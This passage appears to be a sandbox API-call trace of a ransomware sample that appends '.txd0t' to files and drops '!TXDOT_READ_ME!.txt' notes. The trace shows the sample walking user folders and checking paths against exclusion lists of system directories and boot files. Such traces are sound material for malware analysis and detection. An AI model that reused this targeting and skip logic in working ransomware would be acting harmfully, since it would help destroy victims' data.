returned=".txd0t" [0129.720] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.720] StrCmpW (psz1="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", psz2=".") returned 1 [0129.720] StrCmpW (psz1="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", psz2="..") returned 1 [0129.720] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.720] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.720] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg.txd0t" [0129.720] PathFindExtensionW (pszPath="Xej8a4-yl4uAkyUIiU1.jpg.txd0t") returned=".txd0t" [0129.720] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.721] StrCmpW (psz1="PrintHood", psz2=".") returned 1 [0129.721] StrCmpW (psz1="PrintHood", psz2="..") returned 1 [0129.721] StrCmpW (psz1="Recent", psz2=".") returned 1 [0129.721] StrCmpW (psz1="Recent", psz2="..") returned 1 [0129.721] StrCmpW (psz1="Saved Games", psz2=".") returned 1 [0129.721] StrCmpW (psz1="Saved Games", psz2="..") returned 1 [0129.721] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.721] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.721] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Saved Games", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Saved Games") returned="C:\\Users\\FD1HVy\\Saved Games" [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\system32\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\system\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\appdata\\local\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\boot\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\perflogs\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\programdata\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\drivers\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\wsus\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="crypt_detect") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="cryptolocker") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="ransomware") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="C:\\WINDOWS") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.721] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="C:\\Program Files") returned 0x0 [0129.721] GetProcessHeap () returned 0xe30000 [0129.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b8) returned 0xed39f8 [0129.721] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Saved Games", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Saved Games") returned="C:\\Users\\FD1HVy\\Saved Games" [0129.722] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Saved Games", psz2="\\*", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Saved Games\\*") returned="C:\\Users\\FD1HVy\\Saved Games\\*" [0129.722] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Saved Games\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.722] StrCmpW (psz1=".", psz2=".") returned 0 [0129.722] StrCmpW (psz1="..", psz2=".") returned 1 [0129.722] StrCmpW (psz1="..", psz2="..") returned 0 [0129.722] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.722] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.722] StrCmpW (psz1="Searches", psz2=".") returned 1 [0129.722] StrCmpW (psz1="Searches", psz2="..") returned 1 [0129.722] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.722] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.722] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Searches", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\system32\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\system\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\appdata\\local\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\boot\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\perflogs\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\programdata\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\drivers\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\wsus\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="crypt_detect") returned 0x0 [0129.722] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="cryptolocker") returned 0x0 [0129.723] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="ransomware") returned 0x0 [0129.723] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="C:\\WINDOWS") returned 0x0 [0129.723] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.723] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="C:\\Program Files") returned 0x0 [0129.723] GetProcessHeap () returned 0xe30000 [0129.723] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xed39f8 [0129.723] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0129.723] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\*") returned="C:\\Users\\FD1HVy\\Searches\\*" [0129.723] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Searches\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x5b010c55, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5b010c55, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.723] StrCmpW (psz1=".", psz2=".") returned 0 [0129.723] StrCmpW (psz1="..", psz2=".") returned 1 [0129.723] StrCmpW (psz1="..", psz2="..") returned 0 [0129.723] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.723] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.723] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0129.723] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0129.723] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Searches\\!TXDOT_READ_ME!.txt" [0129.723] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.723] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.723] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.723] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.723] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.723] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.723] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.723] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.723] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.723] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.723] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.723] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.723] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.723] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.724] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.724] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.724] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.724] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.724] StrCmpW (psz1="Everywhere.search-ms.txd0t", psz2=".") returned 1 [0129.724] StrCmpW (psz1="Everywhere.search-ms.txd0t", psz2="..") returned 1 [0129.724] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0129.724] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0129.724] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="Everywhere.search-ms.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.txd0t") returned="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.txd0t" [0129.724] PathFindExtensionW (pszPath="Everywhere.search-ms.txd0t") returned=".txd0t" [0129.724] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.724] StrCmpW (psz1="Indexed Locations.search-ms.txd0t", psz2=".") returned 1 [0129.724] StrCmpW (psz1="Indexed Locations.search-ms.txd0t", psz2="..") returned 1 [0129.724] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0129.724] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0129.724] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="Indexed Locations.search-ms.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.txd0t") returned="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.txd0t" [0129.724] PathFindExtensionW (pszPath="Indexed Locations.search-ms.txd0t") returned=".txd0t" [0129.724] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.724] StrCmpW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t", psz2=".") returned 1 [0129.724] StrCmpW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t", psz2="..") returned 1 [0129.724] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0129.724] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0129.724] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t") returned="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t" [0129.724] PathFindExtensionW (pszPath="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t") returned=".txd0t" [0129.724] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.724] StrCmpW (psz1="SendTo", psz2=".") returned 1 [0129.724] StrCmpW (psz1="SendTo", psz2="..") returned 1 [0129.724] StrCmpW (psz1="Start Menu", psz2=".") returned 1 [0129.724] StrCmpW (psz1="Start Menu", psz2="..") returned 1 [0129.724] StrCmpW (psz1="Templates", psz2=".") returned 1 [0129.724] StrCmpW (psz1="Templates", psz2="..") returned 1 [0129.725] StrCmpW (psz1="Videos", psz2=".") returned 1 [0129.725] StrCmpW (psz1="Videos", psz2="..") returned 1 [0129.725] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.725] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.725] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Videos", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\system32\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\system\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\appdata\\local\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\boot\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\perflogs\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\programdata\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\drivers\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\wsus\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="crypt_detect") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="cryptolocker") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="ransomware") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="C:\\WINDOWS") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.725] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="C:\\Program Files") returned 0x0 [0129.725] GetProcessHeap () returned 0xe30000 [0129.725] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xed39f8 [0129.725] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0129.725] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\*") returned="C:\\Users\\FD1HVy\\Videos\\*" [0129.725] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x52e1f316, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e1f316, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.726] StrCmpW (psz1=".", psz2=".") returned 0 [0129.726] StrCmpW (psz1="..", psz2=".") returned 1 [0129.726] StrCmpW (psz1="..", psz2="..") returned 0 [0129.726] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.726] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.726] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0129.726] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0129.726] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\!TXDOT_READ_ME!.txt" [0129.726] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.726] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.726] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.726] StrCmpW (psz1="42OnoQ2VRBixgPOTlYl.avi.txd0t", psz2=".") returned 1 [0129.726] StrCmpW (psz1="42OnoQ2VRBixgPOTlYl.avi.txd0t", psz2="..") returned 1 [0129.726] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0129.726] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0129.726] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="42OnoQ2VRBixgPOTlYl.avi.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi.txd0t" [0129.726] PathFindExtensionW (pszPath="42OnoQ2VRBixgPOTlYl.avi.txd0t") returned=".txd0t" [0129.726] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.726] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.727] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.727] StrCmpW (psz1="E10w7BI-yN9p", psz2=".") returned 1 [0129.727] StrCmpW (psz1="E10w7BI-yN9p", psz2="..") returned 1 [0129.727] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0129.727] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0129.727] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="E10w7BI-yN9p", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\system32\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\system\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\appdata\\local\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\boot\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\perflogs\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\programdata\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", 